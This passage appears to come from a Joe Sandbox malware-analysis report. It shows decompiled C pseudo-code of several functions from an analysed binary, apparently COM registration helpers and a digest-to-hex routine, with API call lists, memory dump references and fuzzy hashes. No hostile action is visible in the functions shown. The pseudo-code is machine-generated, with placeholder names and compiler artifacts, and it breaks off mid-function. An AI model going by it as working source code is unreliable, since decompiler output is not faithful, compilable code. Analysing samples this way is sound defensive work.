                                                                                                                                                                                          0x00c9a249
                                                                                                                                                                                          0x00c9a249
                                                                                                                                                                                          0x00c9a249
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a21c
                                                                                                                                                                                          0x00c9a18b
                                                                                                                                                                                          0x00c9a18b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a18b

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C98C10: lstrcmpiW.KERNEL32(?), ref: 00C98C7C
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,8A9E1774), ref: 00C9A1E4
                                                                                                                                                                                          • CharNextW.USER32(?), ref: 00C9A21D
                                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00C9A236
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext$lstrcmpilstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1051761657-0
                                                                                                                                                                                          • Opcode ID: 42f4a1b4daa5de22b5e89ed59eed559f140ecbaebb771ddb96084f297dc416c5
                                                                                                                                                                                          • Instruction ID: 53eb92f5b757c6ffd89d201e2bcbd27b2b2bc5eaf4da3ceaeeab759ca71e3c3e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 42f4a1b4daa5de22b5e89ed59eed559f140ecbaebb771ddb96084f297dc416c5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D819371900249EFCF21DFA4CD89AEE77B9FF58310F14402AEA49D7290DB749A44D7A2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9B30A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00C9B30A(void* __ebx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t41;
				struct HINSTANCE__* _t45;
				long _t51;
				short _t55;
				struct HINSTANCE__* _t58;
				void* _t61;
				void* _t62;
				int _t73;
				void* _t76;
				short _t84;
				void* _t89;
				struct HINSTANCE__* _t91;
				void* _t92;
				struct HINSTANCE__* _t94;
				void* _t96;
				signed int _t98;
				void* _t100;

				_t89 = __edx;
				_t76 = __ebx;
				_t98 = _t100 - 0x9e8;
				_t41 =  *0xd64070; // 0x8a9e1774
				 *(_t98 + 0x9e4) = _t41 ^ _t98;
				_t94 =  *(_t98 + 0x9fc);
				_t91 =  *(_t98 + 0x9f0);
				 *((intOrPtr*)(_t98 - 0x54)) =  *((intOrPtr*)(_t98 + 0x9f4));
				E00C9A90C(_t98 - 0x80);
				_t45 = E00C8DE80();
				if(_t45 < 0) {
					L3:
					_t95 = _t45;
					L4:
					E00C99400(_t76, _t98 - 0x80, _t89, _t91);
					_pop(_t92);
					_pop(_t96);
					return E00D0071A(_t95, _t76,  *(_t98 + 0x9e4) ^ _t98, _t89, _t92, _t96);
				}
				 *((char*)(_t98 - 0x58)) = 1;
				if(_t94 == 0) {
					L7:
					_t45 =  *((intOrPtr*)(_t91->i + 0x14))(_t98 - 0x80);
					if(_t45 < 0) {
						goto L3;
					}
					_t91 =  *0xd675f8; // 0xc80000
					 *(_t98 - 0x50) =  *(_t98 - 0x50) & 0x00000000;
					_t51 = GetModuleFileNameW(_t91, _t98 + 0x7dc, 0x104);
					if(_t51 != 0) {
						__eflags = _t51 - 0x104;
						if(_t51 != 0x104) {
							E00C9894A(_t98 - 0x4c, 0x208, _t98 + 0x7dc);
							__eflags = _t91;
							if(_t91 == 0) {
								L17:
								_t55 = 0x22;
								 *(_t98 + 0x3c4) = _t55;
								_t58 = E00C9884E(_t98 + 0x3c6, 0x20b, _t98 - 0x4c);
								__eflags = _t58;
								if(_t58 != 0) {
									_t61 = lstrlenW(_t98 + 0x3c4) + _t60;
									_t84 = 0x22;
									 *((short*)(_t98 + _t61 + 0x3c4)) = _t84;
									__eflags = 0;
									 *((short*)(_t98 + _t61 + 0x3c6)) = 0;
									_t62 = _t98 + 0x3c4;
									L20:
									_push(_t62);
									_push(L"Module");
									_push(_t98 - 0x80);
									_t64 = E00C9A092(_t76, _t91, 0x104, __eflags);
									_t95 = _t64;
									__eflags = _t64;
									if(__eflags < 0) {
										L11:
										E00C98F74(_t64, _t98 - 0x50);
										goto L4;
									}
									_push(_t98 - 0x4c);
									_push(L"Module_Raw");
									_push(_t98 - 0x80);
									_t95 = E00C9A092(_t76, _t91, _t95, __eflags);
									__eflags = _t95;
									if(_t95 < 0) {
										goto L11;
									}
									__eflags =  *(_t98 + 0x9f8);
									_push(L"REGISTRY");
									_push( *((intOrPtr*)(_t98 - 0x54)));
									_push(_t98 + 0x7dc);
									_push(_t98 - 0x80);
									if(__eflags == 0) {
										_t64 = E00C9B2B7(_t76, _t89, _t91, _t95, __eflags);
									} else {
										_t64 = E00C9B227(_t76, _t89, _t91, _t95, __eflags);
									}
									L10:
									_t95 = _t64;
									goto L11;
								}
								E00C98F74(_t58, _t98 - 0x50);
								_t95 = 0x80004005;
								goto L4;
							}
							__eflags = _t91 - GetModuleHandleW(0);
							if(__eflags == 0) {
								goto L17;
							}
							_t62 = _t98 - 0x4c;
							goto L20;
						}
						E00C98F74(_t51, _t98 - 0x50);
						_t95 = 0x8007007a;
						goto L4;
					}
					_t64 = E00C963C0();
					goto L10;
				}
				while(1) {
					_t73 = _t94->i;
					if(_t73 == 0) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t94 + 4)));
					_push(_t73);
					_push(_t98 - 0x80);
					E00C9A092(_t76, _t91, _t94, __eflags);
					_t94 = _t94 + 8;
					__eflags = _t94;
				}
				goto L7;
			}























                                                                                                                                                                                          0x00c9b30a
                                                                                                                                                                                          0x00c9b30a
                                                                                                                                                                                          0x00c9b30b
                                                                                                                                                                                          0x00c9b318
                                                                                                                                                                                          0x00c9b31f
                                                                                                                                                                                          0x00c9b32c
                                                                                                                                                                                          0x00c9b333
                                                                                                                                                                                          0x00c9b33c
                                                                                                                                                                                          0x00c9b33f
                                                                                                                                                                                          0x00c9b347
                                                                                                                                                                                          0x00c9b34e
                                                                                                                                                                                          0x00c9b35a
                                                                                                                                                                                          0x00c9b35a
                                                                                                                                                                                          0x00c9b35c
                                                                                                                                                                                          0x00c9b35f
                                                                                                                                                                                          0x00c9b36a
                                                                                                                                                                                          0x00c9b36f
                                                                                                                                                                                          0x00c9b37c
                                                                                                                                                                                          0x00c9b37c
                                                                                                                                                                                          0x00c9b350
                                                                                                                                                                                          0x00c9b356
                                                                                                                                                                                          0x00c9b395
                                                                                                                                                                                          0x00c9b39d
                                                                                                                                                                                          0x00c9b3a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b3a4
                                                                                                                                                                                          0x00c9b3aa
                                                                                                                                                                                          0x00c9b3bc
                                                                                                                                                                                          0x00c9b3c4
                                                                                                                                                                                          0x00c9b3d7
                                                                                                                                                                                          0x00c9b3d9
                                                                                                                                                                                          0x00c9b3fd
                                                                                                                                                                                          0x00c9b405
                                                                                                                                                                                          0x00c9b407
                                                                                                                                                                                          0x00c9b41a
                                                                                                                                                                                          0x00c9b41c
                                                                                                                                                                                          0x00c9b41d
                                                                                                                                                                                          0x00c9b434
                                                                                                                                                                                          0x00c9b43c
                                                                                                                                                                                          0x00c9b43e
                                                                                                                                                                                          0x00c9b45f
                                                                                                                                                                                          0x00c9b463
                                                                                                                                                                                          0x00c9b464
                                                                                                                                                                                          0x00c9b46c
                                                                                                                                                                                          0x00c9b46e
                                                                                                                                                                                          0x00c9b476
                                                                                                                                                                                          0x00c9b47c
                                                                                                                                                                                          0x00c9b47c
                                                                                                                                                                                          0x00c9b47d
                                                                                                                                                                                          0x00c9b485
                                                                                                                                                                                          0x00c9b486
                                                                                                                                                                                          0x00c9b48b
                                                                                                                                                                                          0x00c9b48d
                                                                                                                                                                                          0x00c9b48f
                                                                                                                                                                                          0x00c9b3cd
                                                                                                                                                                                          0x00c9b3d0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b3d0
                                                                                                                                                                                          0x00c9b498
                                                                                                                                                                                          0x00c9b499
                                                                                                                                                                                          0x00c9b4a1
                                                                                                                                                                                          0x00c9b4a7
                                                                                                                                                                                          0x00c9b4a9
                                                                                                                                                                                          0x00c9b4ab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b4b1
                                                                                                                                                                                          0x00c9b4b8
                                                                                                                                                                                          0x00c9b4bd
                                                                                                                                                                                          0x00c9b4c6
                                                                                                                                                                                          0x00c9b4ca
                                                                                                                                                                                          0x00c9b4cb
                                                                                                                                                                                          0x00c9b4d7
                                                                                                                                                                                          0x00c9b4cd
                                                                                                                                                                                          0x00c9b4cd
                                                                                                                                                                                          0x00c9b4cd
                                                                                                                                                                                          0x00c9b3cb
                                                                                                                                                                                          0x00c9b3cb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b3cb
                                                                                                                                                                                          0x00c9b443
                                                                                                                                                                                          0x00c9b448
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b448
                                                                                                                                                                                          0x00c9b411
                                                                                                                                                                                          0x00c9b413
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b415
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b415
                                                                                                                                                                                          0x00c9b3de
                                                                                                                                                                                          0x00c9b3e3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b3e3
                                                                                                                                                                                          0x00c9b3c6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b3c6
                                                                                                                                                                                          0x00c9b38f
                                                                                                                                                                                          0x00c9b38f
                                                                                                                                                                                          0x00c9b393
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b37f
                                                                                                                                                                                          0x00c9b382
                                                                                                                                                                                          0x00c9b386
                                                                                                                                                                                          0x00c9b387
                                                                                                                                                                                          0x00c9b38c
                                                                                                                                                                                          0x00c9b38c
                                                                                                                                                                                          0x00c9b38c
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C8DE80: InitializeCriticalSection.KERNEL32(?,8A9E1774,000000FF,?,00000000,00D59874,00C8CCF8), ref: 00C8DEBB
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00C80000,?,00000104), ref: 00C9B3BC
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00C9B40B
                                                                                                                                                                                            • Part of subcall function 00C9884E: lstrlenW.KERNEL32(?), ref: 00C98852
                                                                                                                                                                                            • Part of subcall function 00C9884E: _memcpy_s.LIBCMT ref: 00C9886C
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00C9B459
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Modulelstrlen$CriticalFileHandleInitializeNameSection_memcpy_s
                                                                                                                                                                                          • String ID: Module$Module_Raw$REGISTRY
                                                                                                                                                                                          • API String ID: 105824736-549000027
                                                                                                                                                                                          • Opcode ID: 8349861333c4445e48157962dffedf3a7b441bdb4203c09f3e1017cbdb9a56aa
                                                                                                                                                                                          • Instruction ID: 5be28be6294033fbe09b8c8c16ffc9bea2de7c7c76b3e136319b98c86f6948b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8349861333c4445e48157962dffedf3a7b441bdb4203c09f3e1017cbdb9a56aa
                                                                                                                                                                                          • Instruction Fuzzy Hash: F8517032900259ABDF21DBE4ED49BEE73A8BF14704F04052AE919EB151EF74AE049B61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9B4E1 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 139stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00C9B4E1(void* __ebx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				struct HINSTANCE__* _t42;
				long _t48;
				short _t52;
				struct HINSTANCE__* _t55;
				void* _t58;
				void* _t59;
				int _t70;
				void* _t73;
				short _t81;
				void* _t86;
				struct HINSTANCE__* _t88;
				void* _t89;
				struct HINSTANCE__* _t91;
				void* _t93;
				signed int _t95;
				void* _t97;

				_t86 = __edx;
				_t73 = __ebx;
				_t95 = _t97 - 0x9e4;
				_t39 =  *0xd64070; // 0x8a9e1774
				 *(_t95 + 0x9e0) = _t39 ^ _t95;
				_t91 =  *(_t95 + 0x9f8);
				_t88 =  *(_t95 + 0x9ec);
				E00C9A90C(_t95 - 0x80);
				_t42 = E00C8DE80();
				if(_t42 < 0) {
					L3:
					_t92 = _t42;
					L4:
					E00C99400(_t73, _t95 - 0x80, _t86, _t88);
					_pop(_t89);
					_pop(_t93);
					return E00D0071A(_t92, _t73,  *(_t95 + 0x9e0) ^ _t95, _t86, _t89, _t93);
				}
				 *((char*)(_t95 - 0x58)) = 1;
				if(_t91 == 0) {
					L7:
					_t42 =  *((intOrPtr*)(_t88->i + 0x14))(_t95 - 0x80);
					if(_t42 < 0) {
						goto L3;
					}
					_t88 =  *0xd675f8; // 0xc80000
					 *(_t95 - 0x54) =  *(_t95 - 0x54) & 0x00000000;
					_t48 = GetModuleFileNameW(_t88, _t95 + 0x7d8, 0x104);
					if(_t48 != 0) {
						__eflags = _t48 - 0x104;
						if(_t48 != 0x104) {
							E00C9894A(_t95 - 0x50, 0x208, _t95 + 0x7d8);
							__eflags = _t88;
							if(_t88 == 0) {
								L17:
								_t52 = 0x22;
								 *(_t95 + 0x3c0) = _t52;
								_t55 = E00C9884E(_t95 + 0x3c2, 0x20b, _t95 - 0x50);
								__eflags = _t55;
								if(_t55 != 0) {
									_t58 = lstrlenW(_t95 + 0x3c0) + _t57;
									_t81 = 0x22;
									 *((short*)(_t95 + _t58 + 0x3c0)) = _t81;
									__eflags = 0;
									 *((short*)(_t95 + _t58 + 0x3c2)) = 0;
									_t59 = _t95 + 0x3c0;
									L20:
									_push(_t59);
									_push(L"Module");
									_push(_t95 - 0x80);
									_t61 = E00C9A092(_t73, _t88, 0x104, __eflags);
									_t92 = _t61;
									__eflags = _t61;
									if(__eflags < 0) {
										L11:
										E00C98F74(_t61, _t95 - 0x54);
										goto L4;
									}
									_push(_t95 - 0x50);
									_push(L"Module_Raw");
									_push(_t95 - 0x80);
									_t92 = E00C9A092(_t73, _t88, _t92, __eflags);
									__eflags = _t92;
									if(_t92 < 0) {
										goto L11;
									}
									__eflags =  *(_t95 + 0x9f4);
									_push(L"REGISTRY");
									_push( *((intOrPtr*)(_t95 + 0x9f0)));
									_push(_t95 + 0x7d8);
									_push(_t95 - 0x80);
									if(__eflags == 0) {
										_t61 = E00C9B27B(_t73, _t86, _t88, _t92, __eflags);
									} else {
										_t61 = E00C9B1EA(_t73, _t86, _t88, _t92, __eflags);
									}
									L10:
									_t92 = _t61;
									goto L11;
								}
								E00C98F74(_t55, _t95 - 0x54);
								_t92 = 0x80004005;
								goto L4;
							}
							__eflags = _t88 - GetModuleHandleW(0);
							if(__eflags == 0) {
								goto L17;
							}
							_t59 = _t95 - 0x50;
							goto L20;
						}
						E00C98F74(_t48, _t95 - 0x54);
						_t92 = 0x8007007a;
						goto L4;
					}
					_t61 = E00C963C0();
					goto L10;
				}
				while(1) {
					_t70 = _t91->i;
					if(_t70 == 0) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push(_t70);
					_push(_t95 - 0x80);
					E00C9A092(_t73, _t88, _t91, __eflags);
					_t91 = _t91 + 8;
					__eflags = _t91;
				}
				goto L7;
			}























                                                                                                                                                                                          0x00c9b4e1
                                                                                                                                                                                          0x00c9b4e1
                                                                                                                                                                                          0x00c9b4e2
                                                                                                                                                                                          0x00c9b4ef
                                                                                                                                                                                          0x00c9b4f6
                                                                                                                                                                                          0x00c9b4fd
                                                                                                                                                                                          0x00c9b504
                                                                                                                                                                                          0x00c9b50d
                                                                                                                                                                                          0x00c9b515
                                                                                                                                                                                          0x00c9b51c
                                                                                                                                                                                          0x00c9b528
                                                                                                                                                                                          0x00c9b528
                                                                                                                                                                                          0x00c9b52a
                                                                                                                                                                                          0x00c9b52d
                                                                                                                                                                                          0x00c9b538
                                                                                                                                                                                          0x00c9b53d
                                                                                                                                                                                          0x00c9b54a
                                                                                                                                                                                          0x00c9b54a
                                                                                                                                                                                          0x00c9b51e
                                                                                                                                                                                          0x00c9b524
                                                                                                                                                                                          0x00c9b563
                                                                                                                                                                                          0x00c9b56b
                                                                                                                                                                                          0x00c9b570
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b572
                                                                                                                                                                                          0x00c9b578
                                                                                                                                                                                          0x00c9b58a
                                                                                                                                                                                          0x00c9b592
                                                                                                                                                                                          0x00c9b5a5
                                                                                                                                                                                          0x00c9b5a7
                                                                                                                                                                                          0x00c9b5cb
                                                                                                                                                                                          0x00c9b5d3
                                                                                                                                                                                          0x00c9b5d5
                                                                                                                                                                                          0x00c9b5e8
                                                                                                                                                                                          0x00c9b5ea
                                                                                                                                                                                          0x00c9b5eb
                                                                                                                                                                                          0x00c9b602
                                                                                                                                                                                          0x00c9b60a
                                                                                                                                                                                          0x00c9b60c
                                                                                                                                                                                          0x00c9b62d
                                                                                                                                                                                          0x00c9b631
                                                                                                                                                                                          0x00c9b632
                                                                                                                                                                                          0x00c9b63a
                                                                                                                                                                                          0x00c9b63c
                                                                                                                                                                                          0x00c9b644
                                                                                                                                                                                          0x00c9b64a
                                                                                                                                                                                          0x00c9b64a
                                                                                                                                                                                          0x00c9b64b
                                                                                                                                                                                          0x00c9b653
                                                                                                                                                                                          0x00c9b654
                                                                                                                                                                                          0x00c9b659
                                                                                                                                                                                          0x00c9b65b
                                                                                                                                                                                          0x00c9b65d
                                                                                                                                                                                          0x00c9b59b
                                                                                                                                                                                          0x00c9b59e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b59e
                                                                                                                                                                                          0x00c9b666
                                                                                                                                                                                          0x00c9b667
                                                                                                                                                                                          0x00c9b66f
                                                                                                                                                                                          0x00c9b675
                                                                                                                                                                                          0x00c9b677
                                                                                                                                                                                          0x00c9b679
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b67f
                                                                                                                                                                                          0x00c9b686
                                                                                                                                                                                          0x00c9b68b
                                                                                                                                                                                          0x00c9b697
                                                                                                                                                                                          0x00c9b69b
                                                                                                                                                                                          0x00c9b69c
                                                                                                                                                                                          0x00c9b6a8
                                                                                                                                                                                          0x00c9b69e
                                                                                                                                                                                          0x00c9b69e
                                                                                                                                                                                          0x00c9b69e
                                                                                                                                                                                          0x00c9b599
                                                                                                                                                                                          0x00c9b599
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b599
                                                                                                                                                                                          0x00c9b611
                                                                                                                                                                                          0x00c9b616
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b616
                                                                                                                                                                                          0x00c9b5df
                                                                                                                                                                                          0x00c9b5e1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b5e3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b5e3
                                                                                                                                                                                          0x00c9b5ac
                                                                                                                                                                                          0x00c9b5b1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b5b1
                                                                                                                                                                                          0x00c9b594
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b594
                                                                                                                                                                                          0x00c9b55d
                                                                                                                                                                                          0x00c9b55d
                                                                                                                                                                                          0x00c9b561
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b54d
                                                                                                                                                                                          0x00c9b550
                                                                                                                                                                                          0x00c9b554
                                                                                                                                                                                          0x00c9b555
                                                                                                                                                                                          0x00c9b55a
                                                                                                                                                                                          0x00c9b55a
                                                                                                                                                                                          0x00c9b55a
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C8DE80: InitializeCriticalSection.KERNEL32(?,8A9E1774,000000FF,?,00000000,00D59874,00C8CCF8), ref: 00C8DEBB
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00C80000,?,00000104), ref: 00C9B58A
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00C9B5D9
                                                                                                                                                                                            • Part of subcall function 00C9884E: lstrlenW.KERNEL32(?), ref: 00C98852
                                                                                                                                                                                            • Part of subcall function 00C9884E: _memcpy_s.LIBCMT ref: 00C9886C
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00C9B627
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Modulelstrlen$CriticalFileHandleInitializeNameSection_memcpy_s
                                                                                                                                                                                          • String ID: Module$Module_Raw$REGISTRY
                                                                                                                                                                                          • API String ID: 105824736-549000027
                                                                                                                                                                                          • Opcode ID: 46815ff9d17da99e4d777d08ffbd3f5757aae100d189c3de69c36405abca3ff6
                                                                                                                                                                                          • Instruction ID: ad31eaea686c5d4151bd98e3e1e580385bf3187f6bb57bcc0da3ff7d24695db1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 46815ff9d17da99e4d777d08ffbd3f5757aae100d189c3de69c36405abca3ff6
                                                                                                                                                                                          • Instruction Fuzzy Hash: B9418372901158ABDF25DBE4ED49FEE73B8BF04704F15052AF806EB141EB74AE089761
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFE1A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E00CFE1A0(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v275;
				char _v276;
				char _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				char _v360;
				char _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				char _v468;
				void* __edi;
				void* __esi;
				signed int _t37;
				intOrPtr* _t43;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				void* _t60;
				void* _t62;
				void* _t66;
				intOrPtr _t69;
				intOrPtr _t74;
				void* _t76;
				intOrPtr _t77;
				void* _t82;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				void* _t90;
				char _t91;
				void* _t92;
				void* _t94;
				void* _t95;
				void* _t96;
				signed int _t99;
				signed int _t101;
				void* _t102;
				signed int _t103;
				void* _t104;

				_t66 = __ebx;
				_t101 = (_t99 & 0xfffffff8) - 0x1d0;
				_t37 =  *0xd64070; // 0x8a9e1774
				_v8 = _t37 ^ _t101;
				_push(_t90);
				_t94 = __ecx;
				_v276 = 0;
				E00D006A0(_t90,  &_v275, 0, 0x103);
				E00D00200( &_v468, 0);
				E00C926B0( &_v276, 0x104, 0xd43194, _t94);
				_t43 =  &_v276;
				_t102 = _t101 + 0x24;
				_t82 = _t43 + 1;
				do {
					_t69 =  *_t43;
					_t43 = _t43 + 1;
				} while (_t69 != 0);
				E00D00250( &_v468,  &_v276, _t43 - _t82);
				E00D00370( &_v468);
				E00D00370( &_v468);
				_v352 = _v376;
				_v356 = _v380;
				_v348 = _v372;
				_v344 = _v368;
				E00D006A0(_t90,  &_v340, 0, 0x40);
				_t103 = _t102 + 0x20;
				_t91 = 0;
				do {
					_v364 = 0;
					_v360 = 0;
					E00C926B0( &_v364, 8, "%02x",  *(_t103 + _t91 + 0x78) & 0x000000ff);
					_t55 =  &_v340;
					_t104 = _t103 + 0x10;
					_t86 = _t55 + 1;
					do {
						_t74 =  *_t55;
						_t55 = _t55 + 1;
					} while (_t74 != 0);
					_t76 = 0x40 - _t55 - _t86;
					_t57 =  &_v364;
					_t95 = _t57 + 1;
					do {
						_t87 =  *_t57;
						_t57 = _t57 + 1;
					} while (_t87 != 0);
					if(0x40 >= _t57 - _t95) {
						_t59 =  &_v364;
						_t88 = _t59 + 1;
						do {
							_t77 =  *_t59;
							_t59 = _t59 + 1;
						} while (_t77 != 0);
						_t60 = _t59 - _t88;
					} else {
						_t60 = _t76;
					}
					_t89 =  &_v364;
					_t62 = E00D0DD00( &_v340,  &_v364, _t60);
					_t91 = _t91 + 1;
					_t103 = _t104 + 0xc;
				} while (_t91 < 0x10);
				if(_t66 != 0) {
					_t97 = _a4;
					E00D006A0(_t91, _t66, 0, _a4);
					E00C926B0(_t66, _t97 - 1, 0xd43194,  &_v340);
					_t62 = E00D0DC99( &_v364, _t91, _t97 - 1, _t66);
					_t103 = _t103 + 0x20;
				}
				_pop(_t92);
				_pop(_t96);
